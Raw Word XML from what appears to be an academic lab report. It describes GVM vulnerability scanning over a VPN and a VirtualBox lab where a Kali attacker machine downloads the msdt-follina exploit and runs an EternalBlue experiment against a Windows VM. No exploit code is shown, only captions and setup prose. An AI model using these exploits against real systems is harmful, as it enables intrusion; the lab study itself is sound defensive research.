            <wp:docPr id="239" name="Picture 23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Picture 239" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId69">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="717" r="1051" b="709"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5630233" cy="4284824"/>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50F7C7E3" w14:textId="5190EE7E" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="250" w:name="_Toc111363617"/>
      <w:bookmarkStart w:id="251" w:name="_Toc111363754"/>
      <w:bookmarkStart w:id="252" w:name="_Toc111981778"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>53</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: GVM opening web browser</w:t>
      </w:r>
      <w:bookmarkEnd w:id="250"/>
      <w:bookmarkEnd w:id="251"/>
      <w:bookmarkEnd w:id="252"/>
    </w:p>
    <w:p w14:paraId="4CBC21D0" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C0340D" w14:textId="7AF41BFF" w:rsidR="00DF42B8" w:rsidRDefault="21523073" w:rsidP="006B521F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t>Figure</w:t>
      </w:r>
      <w:r w:rsidR="00F43D2A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t xml:space="preserve">54 </w:t>
      </w:r>
      <w:r>
        <w:t>sets out the set-up of a Task indicating the type of scan, the host IP addresses, the Secure Shell (SSH) credentials and port number that will allow FortiClient VPN to be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F99A5D9" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16B62983" wp14:editId="65633E56">
            <wp:extent cx="5434519" cy="5019675"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="9525"/>
            <wp:docPr id="63" name="Picture 6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Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5451497" cy="5035357"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C487B" w14:textId="1A6C8823" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="253" w:name="_Toc111363618"/>
      <w:bookmarkStart w:id="254" w:name="_Toc111363755"/>
      <w:bookmarkStart w:id="255" w:name="_Toc111981779"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>54</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Setting up part 1 of the Task</w:t>
      </w:r>
      <w:bookmarkEnd w:id="253"/>
      <w:bookmarkEnd w:id="254"/>
      <w:bookmarkEnd w:id="255"/>
    </w:p>
    <w:p w14:paraId="2EF55793" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152D616C" w14:textId="6990843E" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="006B521F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>55</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> demonstrates how the Task is then used to set up the ‘Scan Targets’ using the network source interface (ie. FortiClient VPN). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FF167F" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B5B487A" wp14:editId="67F844FD">
            <wp:extent cx="5676900" cy="5828665"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19685"/>
            <wp:docPr id="202" name="Picture 20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Picture 202" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId71"/>
                    <a:srcRect l="824" t="487" r="962" b="-1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5678287" cy="5830089"/>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D0ECAB2" w14:textId="3405233F" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="256" w:name="_Toc111363619"/>
      <w:bookmarkStart w:id="257" w:name="_Toc111363756"/>
      <w:bookmarkStart w:id="258" w:name="_Toc111981780"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>55</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Using the Task to set up Scan Target</w:t>
      </w:r>
      <w:bookmarkEnd w:id="256"/>
      <w:bookmarkEnd w:id="257"/>
      <w:bookmarkEnd w:id="258"/>
    </w:p>
    <w:p w14:paraId="7B82F038" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1630E6" w14:textId="0F90ABA9" w:rsidR="007979E4" w:rsidRDefault="006B521F" w:rsidP="007979E4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="259" w:name="_Toc113190745"/>
      <w:r>
        <w:t>4.4.</w:t>
      </w:r>
      <w:r w:rsidR="007E09EB">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007979E4">
        <w:t>Follina Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="259"/>
      <w:r w:rsidR="007979E4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AAC6FB" w14:textId="471C5301" w:rsidR="007979E4" w:rsidRDefault="00C34345" w:rsidP="00C34345">
      <w:pPr>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Two virtual machines were set up on a base machine with an Intel® Core™ i5-3470 CPU @3.20GHz. There was 16 GB RAM and a 64-bit operating system, x64-based processor running Windows. Oracle VM VirtualBox was used to create the WinDev2016 and Kali Linux virtual machines </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5516F">
        <w:t>as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidR="00F43D2A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5268DAE2" w14:textId="3E7BBB58" w:rsidR="00C34345" w:rsidRDefault="00C34345" w:rsidP="00C34345">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="851"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28AD6C79" wp14:editId="523A5491">
            <wp:extent cx="4617720" cy="2240280"/>
            <wp:effectExtent l="19050" t="19050" r="11430" b="2667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2">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="932" t="1392" r="18502" b="16771"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4617720" cy="2240280"/>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2BCEFB0F" w14:textId="73727E20" w:rsidR="00C34345" w:rsidRDefault="00C34345" w:rsidP="00C34345">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="260" w:name="_Toc111363620"/>
      <w:bookmarkStart w:id="261" w:name="_Toc111363757"/>
      <w:bookmarkStart w:id="262" w:name="_Toc111981781"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>56</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: WinDev2016 &amp; Kali Linux Virtual Machines</w:t>
      </w:r>
      <w:bookmarkEnd w:id="260"/>
      <w:bookmarkEnd w:id="261"/>
      <w:bookmarkEnd w:id="262"/>
    </w:p>
    <w:p w14:paraId="0EB46006" w14:textId="71915B04" w:rsidR="00C34345" w:rsidRDefault="00C34345" w:rsidP="00C34345">
      <w:pPr>
        <w:ind w:left="851"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705DA6A1" w14:textId="6763DF2C" w:rsidR="00C34345" w:rsidRDefault="00C34345" w:rsidP="00C34345">
      <w:pPr>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using the Kali Linux machine as the attacker, </w:t>
      </w:r>
      <w:r w:rsidR="004D6B37">
        <w:t>msdt-follina was downloaded from Github</w:t>
      </w:r>
      <w:r w:rsidR="00132C6E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1390303992"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[54]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F43D2A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D6B37">
        <w:t xml:space="preserve">as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>57</w:t>
      </w:r>
      <w:r w:rsidR="004D6B37">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C86E40" w14:textId="5E142931" w:rsidR="004D6B37" w:rsidRDefault="004D6B37" w:rsidP="004D6B37">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="851"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251768832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62743390" wp14:editId="68477974">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1295400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1509395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="929640" cy="190500"/>
                <wp:effectExtent l="19050" t="19050" r="22860" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="34" name="Rectangle 34"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="929640" cy="190500"/>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F11749" id="Rectangle 34" o:spid="_x0000_s1026" style="position:absolute;margin-left:102pt;margin-top:118.85pt;width:73.2pt;height:15pt;z-index:251768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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251760640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F495E82" wp14:editId="32DE0F65">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>891540</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>38735</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3147060" cy="167640"/>
                <wp:effectExtent l="19050" t="19050" r="15240" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="32" name="Rectangle 32"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3147060" cy="167640"/>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71836E" id="Rectangle 32" o:spid="_x0000_s1026" style="position:absolute;margin-left:70.2pt;margin-top:3.05pt;width:247.8pt;height:13.2pt;z-index:251760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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B20987C" wp14:editId="29B396E6">
            <wp:extent cx="4762500" cy="1813463"/>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3">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1617" r="6505" b="27421"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4773413" cy="1817619"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="467D2780" w14:textId="6B5815EA" w:rsidR="004D6B37" w:rsidRDefault="004D6B37" w:rsidP="004D6B37">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="263" w:name="_Toc111363621"/>
      <w:bookmarkStart w:id="264" w:name="_Toc111363758"/>
      <w:bookmarkStart w:id="265" w:name="_Toc111981782"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>57</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Successful Download of MSDT-Follina</w:t>
      </w:r>
      <w:bookmarkEnd w:id="263"/>
      <w:bookmarkEnd w:id="264"/>
      <w:bookmarkEnd w:id="265"/>
    </w:p>
    <w:p w14:paraId="368B6C2A" w14:textId="77777777" w:rsidR="004D6B37" w:rsidRPr="004D6B37" w:rsidRDefault="004D6B37" w:rsidP="004D6B37"/>
    <w:p w14:paraId="7BBEA626" w14:textId="2FFBBA49" w:rsidR="00C34345" w:rsidRDefault="00C5516F" w:rsidP="00C34345">
      <w:pPr>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>58</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> illustrates that the Follina.py file is included in the </w:t>
      </w:r>
      <w:r w:rsidR="004D6B37">
        <w:t xml:space="preserve">msdt-follina </w:t>
      </w:r>
      <w:r>
        <w:t>folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29369AD8" w14:textId="68E2D0EB" w:rsidR="004D6B37" w:rsidRDefault="004D6B37" w:rsidP="004D6B37">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="851"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72236D92" wp14:editId="224E6F49">
            <wp:extent cx="3162300" cy="1639173"/>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74">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2137" t="53425" r="51282" b="7877"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3175363" cy="1645944"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6075BC2F" w14:textId="2144AC9C" w:rsidR="004D6B37" w:rsidRDefault="004D6B37" w:rsidP="004D6B37">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="266" w:name="_Toc111363622"/>
      <w:bookmarkStart w:id="267" w:name="_Toc111363759"/>
      <w:bookmarkStart w:id="268" w:name="_Toc111981783"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>58</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Follina.py in the msdt-follina folder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="266"/>
      <w:bookmarkEnd w:id="267"/>
      <w:bookmarkEnd w:id="268"/>
    </w:p>
    <w:p w14:paraId="69468136" w14:textId="3F6CAD41" w:rsidR="00DF42B8" w:rsidRDefault="007979E4" w:rsidP="00A04E1A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="269" w:name="_Toc113190746"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.4.</w:t>
      </w:r>
      <w:r w:rsidR="007E09EB">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A04E1A">
        <w:t xml:space="preserve">Setup for the </w:t>
      </w:r>
      <w:r w:rsidR="00B83046">
        <w:t xml:space="preserve">EternalBlue </w:t>
      </w:r>
      <w:r w:rsidR="00A04E1A">
        <w:t>Experiment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="269"/>
    </w:p>
    <w:p w14:paraId="21CC345E" w14:textId="3A3B11D7" w:rsidR="004469E5" w:rsidRPr="004469E5" w:rsidRDefault="004469E5" w:rsidP="00A04E1A">
      <w:pPr>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r w:rsidRPr="004469E5">
        <w:t xml:space="preserve">The ‘Follina setup’ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">was used for the EternalBlue experiment (figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>) with the Kali Linux machine performing the experiment on the Windows machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA0585" w14:textId="5062CF97" w:rsidR="00823145" w:rsidRDefault="00823145" w:rsidP="00823145">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00823145">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="156B67CE" wp14:editId="4CB82B52">
            <wp:extent cx="1744857" cy="1506605"/>
            <wp:effectExtent l="19050" t="19050" r="27305" b="17780"/>
            <wp:docPr id="19" name="Picture 1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10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId75"/>
                    <a:srcRect t="3250" r="62728" b="5114"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1749768" cy="1510846"/>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79C2B5C9" w14:textId="18C42B88" w:rsidR="00823145" w:rsidRDefault="00823145" w:rsidP="00823145">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="270" w:name="_Toc111363623"/>
      <w:bookmarkStart w:id="271" w:name="_Toc111363760"/>
      <w:bookmarkStart w:id="272" w:name="_Toc111981784"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>59</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Virtual Machines in Oracle VirtualBox</w:t>
      </w:r>
      <w:bookmarkEnd w:id="270"/>
      <w:bookmarkEnd w:id="271"/>
      <w:bookmarkEnd w:id="272"/>
    </w:p>
    <w:p w14:paraId="0B7F497D" w14:textId="39A60A9F" w:rsidR="00823145" w:rsidRDefault="00823145" w:rsidP="001F20D1">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F25812" w14:textId="2A68F314" w:rsidR="00823145" w:rsidRDefault="00A71245" w:rsidP="00BC61F9">
      <w:pPr>
        <w:ind w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The networks were set up as illustrated in figures </w:t>
      </w:r>
      <w:r w:rsidR="001F20D1">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="001F20D1">
        <w:t xml:space="preserve"> and 6</w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D53CF4" w14:textId="19F24E34" w:rsidR="00823145" w:rsidRDefault="00A71245" w:rsidP="00A71245">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A71245">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E76EFCF" wp14:editId="62999863">
            <wp:extent cx="4145895" cy="3600383"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="19685"/>
            <wp:docPr id="24" name="Picture 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10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4151088" cy="3604893"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAEDA0F" w14:textId="2B99CD15" w:rsidR="00A71245" w:rsidRDefault="00A71245" w:rsidP="00A71245">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="273" w:name="_Toc111363624"/>
      <w:bookmarkStart w:id="274" w:name="_Toc111363761"/>
      <w:bookmarkStart w:id="275" w:name="_Toc111981785"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>60</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Windows Network Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="273"/>
      <w:bookmarkEnd w:id="274"/>
      <w:bookmarkEnd w:id="275"/>
    </w:p>
    <w:p w14:paraId="725EDA54" w14:textId="10E350C9" w:rsidR="00A71245" w:rsidRDefault="00A71245" w:rsidP="00A71245"/>
    <w:p w14:paraId="7B9EFBBE" w14:textId="2C4A3926" w:rsidR="00A71245" w:rsidRDefault="00A71245" w:rsidP="00A71245">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A71245">
        <w:rPr>
